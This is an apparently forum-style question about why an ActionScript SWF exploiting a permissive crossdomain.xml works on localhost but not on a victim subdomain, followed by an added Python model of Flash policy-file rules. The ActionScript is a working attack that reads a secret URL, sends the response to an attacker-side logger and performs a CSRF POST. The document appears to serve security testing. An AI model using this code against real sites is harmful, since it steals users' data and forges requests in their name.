Inconsistency in performing cross-origin requests using ActionScript


I am using an SWF generated from the following ActionScript to make cross-origin calls from the SWF hosted on http://something.subdomain.victim.com:8000/ to http://victim.com/a?secret=test.

https://victim.com has a permissive crossdomain.xml at https://victim.com/crossdomain.xml as given below.

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy 
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>

ActionScript

// Adaptation of an exploit by John M as described in
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// The PHP server side is replaced with a simpler Python CGI. Thanks to TrustedSec.

package {
 import flash.display.Sprite;
 import flash.events.*;
 import flash.net.URLRequestMethod;
 import flash.net.URLRequest;
 import flash.net.URLVariables;
 import flash.net.URLLoader;
 import flash.net.URLLoaderDataFormat;

 public class crossDomain extends Sprite {
  public function crossDomain() {

   // Fetching secret.

   var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
   var firstloader:URLLoader = new URLLoader();
   firstloader.addEventListener(Event.COMPLETE, completeHandler);
   try {
    firstloader.load(firstrequest);
   } catch (error: Error) {
    trace("Unable to load URL: " + error);
   }

   // Performing CSRF with a POST 

   var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
   var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
   secondrequest.method = URLRequestMethod.POST;
   secondrequest.data = secondvariables;
   var secondloader:URLLoader = new URLLoader();
   secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
   try {
    secondloader.load(secondrequest);
   } catch (error: Error) {
    trace("Unable to load URL");
   }

  }

  private function completeHandler(event: Event): void {

   // Retrieving the HTTP response and posting it to the attacker server.

   var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
   var variables:URLVariables = new URLVariables();
   variables.data = event.target.data;
   request.method = URLRequestMethod.POST;
   request.data = variables;
   var loader:URLLoader = new URLLoader();
   try {
    loader.load(request);
   } catch (error: Error) {
    trace("Unable to load URL");
   }
  }
 }
}
1. I tested this code locally, configuring localhost as the victim origin, which serves a wildcard crossdomain.xml [<allow-access-from domain="*" />], and 127.0.0.1 as the attacker origin, which serves crossDomain.swf.
2. The SWF worked exactly as intended, requesting crossdomain.xml first, followed by calls to the two URLs on origin localhost defined in the ActionScript.
3. However, when hosting this on http://something.subdomain.victim.com:8000, the first step, retrieving crossdomain.xml from https://victim.com/crossdomain.xml, is happening, but the further requests are not.
4. To ensure that it is not a cross-domain policy issue, I did a man-in-the-middle and replaced <allow-access-from domain="*.victim.com" /> with <allow-access-from domain="*" />.
5. So at this stage, as far as the browser is concerned, the crossdomain.xml for victim.com is a *. Yet the further requests are not happening.

I can't find a potential reason for this confusing behaviour. I am an ActionScript noob. Any pointers on why this is happening would be highly appreciated.

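Added example (not part of the question above, and not an answer posted on the page): a small Python model of the documented Flash Player rules for the master crossdomain.xml, run against the hostnames in the question. Two of those rules bear directly on the setup described. First, a policy file is specific to the scheme, host and port it was fetched from, so https://victim.com/crossdomain.xml says nothing about requests to http://victim.com. Second, an <allow-access-from> rule in a policy served over HTTPS has secure="true" by default, which grants access only to SWFs that were themselves loaded over HTTPS unless the rule sets secure="false"; over plain HTTP the attribute is ignored. The SWF filename crossDomain.swf is taken from the question; the <site-control> element, subdirectory policy files and the handling of a bare apex domain against a leading wildcard are left out or simplified as noted in the code.

```python
"""
Added example, not code from the question: a minimal model of how Flash Player
decides whether a SWF at one origin may read data from another origin, based on
the target's master crossdomain.xml. Simplified: no <site-control>, no
<allow-http-request-headers-from>, no subdirectory policy files.
"""
from urllib.parse import urlsplit
import xml.etree.ElementTree as ET

# Policy file quoted in the question (served from https://victim.com).
QUESTION_POLICY = """<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
  SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
  <allow-access-from domain="*.victim.com" />
</cross-domain-policy>
"""

# SWF location from the question (filename crossDomain.swf is from its local test).
SWF_URL = "http://something.subdomain.victim.com:8000/crossDomain.swf"


def _host_matches(pattern: str, host: str) -> bool:
    """Match a domain="..." attribute against the requesting SWF's hostname.

    '*' matches any host; '*.victim.com' matches any host ending in
    '.victim.com'. Assumption: the bare apex 'victim.com' is treated as NOT
    matching a leading wildcard (real Flash behaviour is not modelled here).
    """
    pattern, host = pattern.lower(), host.lower()
    if pattern == "*":
        return True
    if pattern.startswith("*."):
        return host.endswith(pattern[1:])
    return pattern == host


def _origin(url: str):
    """(scheme, host, port) with default ports filled in."""
    u = urlsplit(url)
    port = u.port or (443 if u.scheme.lower() == "https" else 80)
    return (u.scheme.lower(), (u.hostname or "").lower(), port)


def flash_allows(policy_xml: str, policy_url: str, swf_url: str, data_url: str):
    """Return (allowed, reason) for a SWF loaded from swf_url reading data_url.

    Modelled rules:
    * The policy consulted is the master policy of data_url's scheme+host+port;
      a policy on https://victim.com does not cover http://victim.com.
    * domain="..." is matched against the SWF's hostname only; the SWF's port
      (e.g. :8000) plays no part.
    * secure defaults to "true" when the policy is served over HTTPS, so only
      SWFs loaded over HTTPS are granted access unless the rule says
      secure="false". Over HTTP the secure attribute is ignored.
    """
    if _origin(policy_url) != _origin(data_url):
        return False, "policy file is for %s://%s:%d, not the data origin" % _origin(policy_url)

    swf = urlsplit(swf_url)
    policy_scheme = _origin(policy_url)[0]
    root = ET.fromstring(policy_xml)
    if root.tag != "cross-domain-policy":
        return False, "not a cross-domain-policy document"

    for rule in root.findall("allow-access-from"):
        domain = rule.get("domain", "")
        if not _host_matches(domain, swf.hostname or ""):
            continue
        secure = rule.get("secure", "true").lower() != "false"
        if policy_scheme == "https" and secure and swf.scheme.lower() != "https":
            return False, ("rule %r matches, but secure=true (the default over HTTPS): "
                           "the SWF itself must be served over HTTPS" % domain)
        return True, "allowed by rule %r" % domain

    return False, "no allow-access-from rule matches %s" % (swf.hostname or "")


if __name__ == "__main__":
    for data in ("https://victim.com/a?secret=test", "http://victim.com/someaction.html"):
        ok, why = flash_allows(QUESTION_POLICY, "https://victim.com/crossdomain.xml",
                               SWF_URL, data)
        print("%-40s %-5s %s" % (data, ok, why))
```

The check can be run against a live policy file by fetching it and passing the text in as `policy_xml`; the interesting comparisons are the same policy with and without `secure="false"`, and the same SWF served over `http://` versus `https://`.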